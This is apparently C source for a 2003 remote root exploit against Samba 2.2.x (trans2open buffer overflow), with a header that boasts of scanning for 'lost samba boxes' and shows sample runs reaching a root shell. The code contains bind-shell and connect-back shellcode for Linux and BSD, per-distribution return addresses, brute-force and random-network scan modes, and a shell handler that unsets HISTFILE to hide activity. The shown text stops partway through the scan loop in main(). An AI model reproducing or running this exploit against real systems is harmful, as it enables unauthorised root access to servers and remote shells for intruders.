/*           _ ________            _____                        ______
    __ ___ ____       /____.------`    /_______.------.___.----`  ___/____ _______
         _/    \ _   /\   __.  __//   ___/_    ___.  /_\    /_    |     _/
   ___ ._\    . \\  /__  _____/ _    /     \_  |    /__      |   _| slc | _____ _
      - -------\______||--._____\---._______//-|__    //-.___|----._____||
					       / \   /
                                                   \/
[*] samba-2.2.8 < remote root exploit                 by eSDee (www.netric.org|be)
    ------------------------------------------------------------------------------

    sambal.c is a remote root exploit for samba 2.2.x and prior that works against 
    Linux (all distros), FreeBSD (4.x, 5.x), NetBSD (1.x) and OpenBSD (2.x, 3.x 
    and 3.2-non exec stack). It has a scan option, so you can easily identify your 
    lost samba boxes on your home WAN...

    It began with the creation of the great buffer.
    Four bytes were written to it to mark the beginning of it.
    Seven bytes were written to store all information.
    And nine, nine bytes were written to the end to assure a long enough buffer.
    For within this buffer, it could harbor all required user input.
    But they were all deceived, for another byte was written.
    Inside the Memory, in the heart of the stack. The user input was long enough
    to write a master byte. To control the entire buffer, and into this byte, the user
    poured his cruelty, his malice and his will to dominate it all!

    One byte to rule them all.... 

    Copyright (c) 2003 Netric Security
    All rights reserved.

    THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED
    WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF
    MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.


[*] The bug

    in /source/smbd/trans2.c on line 250 - function: call_trans2open() :

    namelen = strlen(pname)+1;
    StrnCpy(fname,pname,namelen); 



[*] MyFirstStachelNET(tm) - howto - 

    sambal.c is able to identify samba boxes. It will send a netbios
    name packet to port 137. If the box responds with the mac address
    00-00-00-00-00-00, it's probally running samba.
 
    [esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0
    samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
    --------------------------------------------------------------
    + Scan mode.
    + [192.168.0.3] Samba
    + [192.168.0.10] Windows
    + [192.168.0.20] Windows
    + [192.168.0.21] Samba
    + [192.168.0.30] Windows
    + [192.168.0.31] Samba
    + [192.168.0.33] Windows
    + [192.168.0.35] Windows
    + [192.168.0.36] Windows
    + [192.168.0.37] Windows
    ...
    + [192.168.0.133] Samba

    Great!
    You could now try a preset (-t0 for a list), but most of the 
    time bruteforce will do. The smbd spawns a new process on every 
    connect, so we can bruteforce the return address...

    [esdee@embrace esdee]$ ./sambal -b 0 -v 192.168.0.133
    samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
    --------------------------------------------------------------
    + Verbose mode.
    + Bruteforce mode. (Linux)
    + Using ret: [0xbffffed4]
    + Using ret: [0xbffffda8]
    + Using ret: [0xbffffc7c]
    + Using ret: [0xbffffb50]
    + Using ret: [0xbffffa24]
    + Using ret: [0xbffff8f8]
    + Using ret: [0xbffff7cc]
    + Worked!
    --------------------------------------------------------------
    *** JE MOET JE MUIL HOUWE
    Linux LittleLinux.selwerd.lan 2.4.18-14 #1 Wed Sep 4 11:57:57 EDT 2002 i586 i586 i386 GNU/Linux
    uid=0(root) gid=0(root) groups=99(nobody)


[*] Credits

    lynx, mike, powerpork, sacrine, the_itch, tozz 
    no1 (i ripped some parts from a subnet scanner) 


*/
  
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netdb.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>

typedef struct {
	unsigned char type;
	unsigned char flags;
	unsigned short length;
} NETBIOS_HEADER;

typedef struct {
	unsigned char protocol[4];
	unsigned char command;
	unsigned short status;
	unsigned char reserved;
	unsigned char  flags;
	unsigned short flags2;
	unsigned char  pad[12];
	unsigned short tid;
	unsigned short pid;
	unsigned short uid;
	unsigned short mid;
} SMB_HEADER;
	
int OWNED = 0;
pid_t childs[100];
struct sockaddr_in addr1;
struct sockaddr_in addr2;

char
linux_bindcode[] =
	"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80"
        "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
        "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50"
        "\x50\x66\x68\xb0\xef\xb3\x02\x66\x53\x89\xe2\xb3\x10\x53\xb3\x02"
        "\x52\x51\x89\xca\x89\xe1\xb0\x66\xcd\x80\x31\xdb\x39\xc3\x74\x05"
        "\x31\xc0\x40\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
        "\x80\x89\xd7\x31\xc0\x31\xdb\x31\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
        "\x80\x31\xc0\x31\xdb\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
        "\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80\x39\xc3\x75\x40\x31\xc0"
        "\x89\xfb\xb0\x06\xcd\x80\x31\xc0\x31\xc9\x89\xf3\xb0\x3f\xcd\x80"
        "\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0"
        "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8b\x54\x24"
        "\x08\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x31\xc0"
        "\x89\xf3\xb0\x06\xcd\x80\xeb\x99";

char
bsd_bindcode[] =
	"\x31\xc0\x50\x50\x50\xb0\x17\xcd\x80"
	"\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
	"\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02"
	"\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80"
	"\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57"
	"\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89"
	"\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50"
	"\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
	"\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56"
	"\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd"
	"\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f"
	"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b"
	"\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80"
	"\xeb\x9a";

char
linux_connect_back[] =
	"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80"
	"\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
	"\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51"
	"\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3"
	"\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
	"\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
	"\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
	"\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f"
	"\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
	"\x01\xcd\x80"; 

char
bsd_connect_back[] =
	"\x31\xc0\x50\x50\x50\xb0\x17\xcd\x80"
        "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
        "\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef"
        "\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0"
        "\xb0\x62\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80"
        "\x31\xc0\x50\x52\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x52"
        "\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x52\x50\xb0\x5a\xcd\x80\x31"
        "\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54"
        "\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";



struct {
        char *type;
        unsigned long ret;
	char *shellcode;
	int os_type;	/* 0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD non-exec stack */

} targets[] = {
	{ "samba-2.2.x - Debian 3.0           ", 0xbffffea2, linux_bindcode,	0 },
	{ "samba-2.2.x - Gentoo 1.4.x         ", 0xbfffe890, linux_bindcode,    0 },
	{ "samba-2.2.x - Mandrake 8.x         ", 0xbffff6a0, linux_bindcode,	0 },
	{ "samba-2.2.x - Mandrake 9.0         ", 0xbfffe638, linux_bindcode,	0 },
        { "samba-2.2.x - Redhat 9.0           ", 0xbffff7cc, linux_bindcode,    0 },
        { "samba-2.2.x - Redhat 8.0           ", 0xbffff2f0, linux_bindcode, 	0 },
	{ "samba-2.2.x - Redhat 7.x           ", 0xbffff310, linux_bindcode, 	0 },
	{ "samba-2.2.x - Redhat 6.x           ", 0xbffff2f0, linux_bindcode, 	0 },
	{ "samba-2.2.x - Slackware 9.0        ", 0xbffff574, linux_bindcode,	0 },
	{ "samba-2.2.x - Slackware 8.x        ", 0xbffff574, linux_bindcode,    0 },
	{ "samba-2.2.x - SuSE 7.x             ", 0xbffffbe6, linux_bindcode,  	0 }, 
	{ "samba-2.2.x - SuSE 8.x             ", 0xbffff8f8, linux_bindcode,    0 },
	{ "samba-2.2.x - FreeBSD 5.0          ", 0xbfbff374, bsd_bindcode,     	1 },
	{ "samba-2.2.x - FreeBSD 4.x          ", 0xbfbff374, bsd_bindcode,	1 },
	{ "samba-2.2.x - NetBSD 1.6           ", 0xbfbfd5d0, bsd_bindcode,	1 },
	{ "samba-2.2.x - NetBSD 1.5           ", 0xbfbfd520, bsd_bindcode,      1 },
	{ "samba-2.2.x - OpenBSD 3.2          ", 0x00159198, bsd_bindcode,	2 },
	{ "samba-2.2.8 - OpenBSD 3.2 (package)", 0x001dd258, bsd_bindcode,      2 },
	{ "samba-2.2.7 - OpenBSD 3.2 (package)", 0x001d9230, bsd_bindcode,      2 },
	{ "samba-2.2.5 - OpenBSD 3.2 (package)", 0x001d6170, bsd_bindcode,      2 },
        { "Crash (All platforms)              ", 0xbade5dee, linux_bindcode,	0 },
};

void shell();
void usage();
void handler();

int is_samba(char *ip, unsigned long time_out);
int Connect(int fd, char *ip, unsigned int port, unsigned int time_out);
int read_timer(int fd, unsigned int time_out);
int write_timer(int fd, unsigned int time_out);
int start_session(int sock);
int exploit_normal(int sock, unsigned long ret, char *shellcode);
int exploit_openbsd32(int sock, unsigned long ret, char *shellcode);

void 
usage(char *prog)
{
        fprintf(stderr, "Usage: %s [-bBcCdfprsStv] [host]\n\n"
        		"-b <platform>   bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)\n"
			"-B <step>       bruteforce steps (default = 300)\n"
			"-c <ip address> connectback ip address\n"
			"-C <max childs> max childs for scan/bruteforce mode (default = 40)\n"
			"-d <delay>      bruteforce/scanmode delay in micro seconds (default = 100000)\n"
			"-f              force\n" 
        		"-p <port>       port to attack (default = 139)\n"
			"-r <ret>        return address\n"
			"-s              scan mode (random)\n"
			"-S <network>    scan mode\n"
			"-t <type>       presets (0 for a list)\n" 
			"-v              verbose mode\n\n", prog);
        
        exit(1);
}

int
is_samba(char *ip, unsigned long time_out)
{
	char
	nbtname[]= /* netbios name packet */
	{
        	0x80,0xf0,0x00,0x10,0x00,0x01,0x00,0x00,
        	0x00,0x00,0x00,0x00,0x20,0x43,0x4b,0x41,
        	0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
        	0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
        	0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
        	0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21,
        	0x00,0x01
	};

        unsigned char recv_buf[1024];
	unsigned char *ptr;

	int i = 0;
	int s = 0;

	unsigned int total = 0;

        if ((s = socket(PF_INET, SOCK_DGRAM, 17)) <= 0) return -1;

	if(Connect(s, ip, 137, time_out) == -1) {
		close(s);
		return -1;
	} 
		
	memset(recv_buf, 0x00, sizeof(recv_buf));

	if(write_timer(s, time_out) == 1) {
		if (write(s, nbtname, sizeof(nbtname)) <= 0) {
 			close(s);
			return -1;
		}
	}

	if (read_timer(s, time_out) == 1) {
		if (read(s, recv_buf, sizeof(recv_buf)) <= 0) {
			close(s);
			return -1;
		}

        	ptr = recv_buf + 57;
 		total = *(ptr - 1); /* max names */
	
        	while(ptr < recv_buf + sizeof(recv_buf)) {
     	        	ptr += 18;
			if (i == total) {

				ptr -= 19;			

				if ( *(ptr + 1) == 0x00 && *(ptr + 2) == 0x00 && *(ptr + 3) == 0x00 &&
 		     	     	     *(ptr + 4) == 0x00 && *(ptr + 5) == 0x00 && *(ptr + 6) == 0x00) {
					close(s);
					return 0;
				}

				close(s);
				return 1;
			}

			i++;	
		}

	}
	close(s);
	return -1;
}

int 
Connect(int fd, char *ip, unsigned int port, unsigned int time_out) 
{
	/* ripped from no1 */

	int                      flags;
	int                      select_status;
	fd_set                   connect_read, connect_write;
	struct timeval           timeout;
	int                      getsockopt_length = 0;
	int                      getsockopt_error = 0;
	struct sockaddr_in       server;
	bzero(&server, sizeof(server));
	server.sin_family = AF_INET;
	inet_pton(AF_INET, ip, &server.sin_addr);
	server.sin_port = htons(port);

	if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
		close(fd);
    		return -1;
  	}
  
	if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
		close(fd);
    		return -1;
  	}
  	
	timeout.tv_sec = time_out;
	timeout.tv_usec = 0;
	FD_ZERO(&connect_read);
	FD_ZERO(&connect_write);
	FD_SET(fd, &connect_read);
	FD_SET(fd, &connect_write);

	if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0) {
		if(errno != EINPROGRESS) {
      			close(fd);
      			return -1;
    		}
  	}
	else {
		if(fcntl(fd, F_SETFL, flags) < 0) {
			close(fd);
      			return -1;
    		}
    		
		return 1;

	}

	select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout);

	if(select_status == 0) {
		close(fd);
		return -1;

	}

	if(select_status == -1) {
		close(fd);
		return -1;
	}

	if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write)) {
		if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write)) {
			getsockopt_length = sizeof(getsockopt_error);

			if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0) {
				errno = ETIMEDOUT;
				close(fd);
				return -1;
			}

			if(getsockopt_error == 0) {
				if(fcntl(fd, F_SETFL, flags) < 0) {
					close(fd);
					return -1;
				}
				return 1;
		        } 

			else {
				errno = getsockopt_error;
				close(fd);
				return (-1);
				}

			}
		}
	else {
		close(fd);
		return 1;
	}

	if(fcntl(fd, F_SETFL, flags) < 0) {
		close(fd);
		return -1;
	}
	return 1;
}

int 
read_timer(int fd, unsigned int time_out)
{

	/* ripped from no1 */

	int                      flags;
	int                      select_status;
	fd_set                   fdread;
	struct timeval           timeout;

	if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
		close(fd);
		return (-1);
	}

	if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
		close(fd);
		return (-1);
	}

	timeout.tv_sec = time_out;
	timeout.tv_usec = 0;
	FD_ZERO(&fdread);
	FD_SET(fd, &fdread);
	select_status = select(fd + 1, &fdread, NULL, NULL, &timeout);

	if(select_status == 0) {
		close(fd);
		return (-1);
	}

	if(select_status == -1) {
		close(fd);
		return (-1);
	}
  
	if(FD_ISSET(fd, &fdread)) {
  
  		if(fcntl(fd, F_SETFL, flags) < 0) {
			close(fd);
      			return -1;
    		}
    		
		return 1;
	
	} 
	else {
		close(fd);
		return 1;

	}
}

int
write_timer(int fd, unsigned int time_out)
{

	/* ripped from no1 */

	int                      flags;
	int                      select_status;
	fd_set                   fdwrite;
	struct timeval           timeout;

	if((flags = fcntl(fd, F_GETFL, 0)) < 0) {    
		close(fd);
		return (-1);
	}
	
	if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
		close(fd);
		return (-1);
  	}
  	
	timeout.tv_sec = time_out;
	timeout.tv_usec = 0;
	FD_ZERO(&fdwrite);
	FD_SET(fd, &fdwrite);

	select_status = select(fd + 1, NULL, &fdwrite, NULL, &timeout);

	if(select_status == 0) {
		close(fd);
		return -1;
	}
	
	if(select_status == -1) {
		close(fd);
		return -1;
	}

	if(FD_ISSET(fd, &fdwrite)) {
		if(fcntl(fd, F_SETFL, flags) < 0) {
			close(fd);
			return -1;
		}
		return 1;
	}
	else { 
		close(fd);
		return -1;
	}
}


void 
shell(int sock)
{
        fd_set  fd_read;
        char buff[1024], *cmd="unset HISTFILE; echo \"*** JE MOET JE MUIL HOUWE\";uname -a;id;\n";
        int n;

        FD_ZERO(&fd_read);
        FD_SET(sock, &fd_read);
        FD_SET(0, &fd_read);

        send(sock, cmd, strlen(cmd), 0);

        while(1) {
                FD_SET(sock,&fd_read);
                FD_SET(0,&fd_read);

                if (select(FD_SETSIZE, &fd_read, NULL, NULL, NULL) < 0 ) break;

                if (FD_ISSET(sock, &fd_read)) {

                        if((n = recv(sock, buff, sizeof(buff), 0)) < 0){
                                fprintf(stderr, "EOF\n");
                                exit(2);
                        }

                        if (write(1, buff, n) < 0) break;
                }

                if (FD_ISSET(0, &fd_read)) {

                        if((n = read(0, buff, sizeof(buff))) < 0){
                                fprintf(stderr, "EOF\n");
                                exit(2);
                        }

                        if (send(sock, buff, n, 0) < 0) break;
                }

                usleep(10);
        }

        fprintf(stderr, "Connection lost.\n\n");
        exit(0);
}

void
handler()
{
	int sock = 0;
	int i = 0;
	OWNED = 1;

        for (i = 0; i < 100; i++)
                if (childs[i] != 0xffffffff) waitpid(childs[i], NULL, 0);

        if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
                close(sock);
		exit(1);
        }

        if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {
                fprintf(stdout, "+ Worked!\n"
                                "--------------------------------------------------------------\n");
                shell(sock);
                close(sock);
        }


}

int 
start_session(int sock)
{
	char buffer[1000];
	char response[4096];
	char session_data1[] 	= "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00";
        char session_data2[] 	= "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64\x79"
		                  "\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24";
	
        NETBIOS_HEADER  *netbiosheader;
        SMB_HEADER      *smbheader;

	memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type 	= 0x00;         /* session message */
        netbiosheader->flags 	= 0x00;
        netbiosheader->length 	= htons(0x2E);

        smbheader->protocol[0] 	= 0xFF;
        smbheader->protocol[1] 	= 'S';
        smbheader->protocol[2] 	= 'M';
        smbheader->protocol[3] 	= 'B';
        smbheader->command 	= 0x73;         /* session setup */
        smbheader->flags 	= 0x08;         /* caseless pathnames */
        smbheader->flags2 	= 0x01;         /* long filenames supported */
        smbheader->pid 		= getpid() & 0xFFFF;
	smbheader->uid          = 100;
        smbheader->mid 		= 0x01;

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data1, sizeof(session_data1) - 1);

	if(write_timer(sock, 3) == 1)
		if (send(sock, buffer, 50, 0) < 0) return -1;

	memset(response, 0x00, sizeof(response));

	if (read_timer(sock, 3) == 1)
		if (read(sock, response, sizeof(response) - 1) < 0) return -1;
	
        netbiosheader = (NETBIOS_HEADER *)response;
        smbheader     = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));

	if (netbiosheader->type != 0x00) fprintf(stderr, "+ Recieved a non session message\n");

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        memset(buffer, 0x00, sizeof(buffer));

        netbiosheader->type     = 0x00;         /* session message */
        netbiosheader->flags    = 0x00;
        netbiosheader->length   = htons(0x3C);

        smbheader->protocol[0]  = 0xFF;
        smbheader->protocol[1]  = 'S';
        smbheader->protocol[2]  = 'M';
        smbheader->protocol[3]  = 'B';
        smbheader->command      = 0x70;         /* start connection */
	smbheader->pid          = getpid() & 0xFFFF;
	smbheader->tid		= 0x00;
        smbheader->uid          = 100;

	memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data2, sizeof(session_data2) - 1);

        if(write_timer(sock, 3) == 1)
                if (send(sock, buffer, 64, 0) < 0) return -1;

        memset(response, 0x00, sizeof(response));

        if (read_timer(sock, 3) == 1)
                if (read(sock, response, sizeof(response) - 1) < 0) return -1;

        netbiosheader = (NETBIOS_HEADER *)response;
        smbheader     = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));

        if (netbiosheader->type != 0x00) return -1;

        return 0;
}

int
exploit_normal(int sock, unsigned long ret, char *shellcode)
{

	char buffer[4000];
        char exploit_data[] =
                "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x90";

	int i = 0;
	unsigned long dummy = ret - 0x90;

        NETBIOS_HEADER  *netbiosheader;
        SMB_HEADER      *smbheader;

	memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type             = 0x00;         /* session message */
        netbiosheader->flags            = 0x04;
        netbiosheader->length           = htons(2096);

        smbheader->protocol[0]          = 0xFF;
        smbheader->protocol[1]          = 'S';
        smbheader->protocol[2]          = 'M';
        smbheader->protocol[3]          = 'B';
        smbheader->command              = 0x32;         /* SMBtrans2 */
	smbheader->tid			= 0x01;
        smbheader->uid                  = 100;

	memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);

	buffer[1096] = 0xEB;
	buffer[1097] = 0x70;

	for (i = 0; i < 4 * 24; i += 8) {
		memcpy(buffer + 1099 + i, &dummy, 4);
		memcpy(buffer + 1103 + i, &ret,   4);
	}

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), 
			exploit_data, sizeof(exploit_data) - 1);
	memcpy(buffer + 1800, shellcode, strlen(shellcode));

	if(write_timer(sock, 3) == 1) {
		if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
		return 0;
	}

	return -1;
}

int
exploit_openbsd32(int sock, unsigned long ret, char *shellcode)
{
        char buffer[4000];

        char exploit_data[] =
                "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x90";

        int i = 0;
        unsigned long dummy = ret - 0x30;
        NETBIOS_HEADER  *netbiosheader;
        SMB_HEADER      *smbheader;

        memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type             = 0x00;         /* session message */
        netbiosheader->flags            = 0x04;
        netbiosheader->length           = htons(2096);

        smbheader->protocol[0]          = 0xFF;
        smbheader->protocol[1]          = 'S';
        smbheader->protocol[2]          = 'M';
        smbheader->protocol[3]          = 'B';
        smbheader->command              = 0x32;         /* SMBtrans2 */
        smbheader->tid                  = 0x01;
        smbheader->uid                  = 100;

        memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);

	for (i = 0; i < 4 * 24; i += 4)
		memcpy(buffer + 1131 + i, &dummy, 4);
		
        memcpy(buffer + 1127, &ret,      4);

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),
                        exploit_data, sizeof(exploit_data) - 1);

        memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode));

        if(write_timer(sock, 3) == 1) {
                if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
                return 0;
        }

        return -1;
}


int
main (int argc,char *argv[])
{
	char *shellcode = NULL;
	char scan_ip[256];

	int brute	= -1;
	int connectback = 0;
	int force	= 0;
	int i		= 0;
	int ip1		= 0;
	int ip2		= 0;
	int ip3		= 0;
	int ip4		= 0;
	int opt		= 0;
	int port	= 139;
	int random	= 0;
	int scan	= 0;
	int sock	= 0;
	int sock2	= 0;
	int status	= 0;
	int type	= 0;
	int verbose	= 0;

	unsigned long BRUTE_DELAY 	= 100000;
	unsigned long ret		= 0x0;
	unsigned long MAX_CHILDS 	= 40;
	unsigned long STEPS		= 300;

        struct hostent 		*he;

	fprintf(stdout, "samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)\n"
			"--------------------------------------------------------------\n");
        
        while((opt = getopt(argc,argv,"b:B:c:C:d:fp:r:sS:t:v")) !=EOF) {
                switch(opt) 
		{
			case 'b':
				brute = atoi(optarg);
				if ((brute < 0) || (brute > 3)) {
					fprintf(stderr, "Invalid platform.\n\n");
					return -1;
				}
				break;
			case 'B':
				STEPS = atoi(optarg);
				if (STEPS == 0) STEPS++;
				break;
			case 'c':
				sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4);
				connectback = 1;

				if (ip1 == 0 || ip2 == 0 || ip3 == 0 || ip4 == 0) {
					fprintf(stderr, "Invalid IP address.\n\n");
					return -1;
				}

				linux_connect_back[33] = ip1; bsd_connect_back[24] = ip1;
				linux_connect_back[34] = ip2; bsd_connect_back[25] = ip2;
				linux_connect_back[35] = ip3; bsd_connect_back[26] = ip3;
				linux_connect_back[36] = ip4; bsd_connect_back[27] = ip4;
	
				break;
			case 'C':
				MAX_CHILDS = atoi(optarg);
				if (MAX_CHILDS == 0) {
					fprintf(stderr, "Invalid number of childs.\n");
					return -1;
				}

				if (MAX_CHILDS > 99) {
					fprintf(stderr, "Too many childs, using 99. \n");
					MAX_CHILDS = 99;
				}

				break;
			case 'd':
				BRUTE_DELAY = atoi(optarg);
				break;
			case 'f':
				force = 1;
				break;
                        case 'p':
                                port = atoi(optarg);
                                if ((port <= 0) || (port > 65535)) {
                                        fprintf(stderr, "Invalid port.\n\n");
                                        return -1;
                                }
                                break;
			case 'r':
				ret = strtoul(optarg, &optarg, 16);
				break;
			case 's':
				random 	= 1;
				scan 	= 1;
				break;
			case 'S':
				random 	= 0;
				scan	= 1;
				sscanf(optarg, "%d.%d.%d", &ip1, &ip2, &ip3);
				ip3--;
				break;
                        case 't':
                                type = atoi(optarg);
                                if (type == 0 || type > sizeof(targets) / 16) {
                                        for(i = 0; i < sizeof(targets) / 16; i++)
                                                fprintf(stdout, "%02d. %s           [0x%08x]\n", i + 1,

                                                                targets[i].type, (unsigned int) targets[i].ret);
                                        fprintf(stderr, "\n");
                                        return -1;
                                }
                                break;
			case 'v':
				verbose = 1;
				break;
                        default:
                                usage(argv[0] == NULL ? "sambal" : argv[0]);
                                break;
                }

        }
	
	if ((argv[optind] == NULL && scan == 0) || (type == 0 && brute == -1 && scan == 0)) 
		usage(argv[0] == NULL ? "sambal" : argv[0]);

	if (scan == 1) 
		fprintf(stdout, "+ Scan mode.\n");
	if (verbose == 1)
		fprintf(stdout, "+ Verbose mode.\n");

	if (scan == 1) {

		srand(getpid());

		while (1) {

			if (random == 1) {
				ip1 = rand() % 255;
				ip2 = rand() % 255;
				ip3 = rand() % 255; } 
			else {
				ip3++;
				if (ip3 > 254) { ip3 = 1; ip2++; }
				if (ip2 > 254) { ip2 = 1; ip1++; }
				if (ip1 > 254) exit(0);
			}

			for (ip4 = 0; ip4 < 255; ip4++) {
				i++;
				snprintf(scan_ip, sizeof(scan_ip) - 1, "%u.%u.%u.%u", ip1, ip2, ip3, ip4);
				usleep(BRUTE_DELAY);

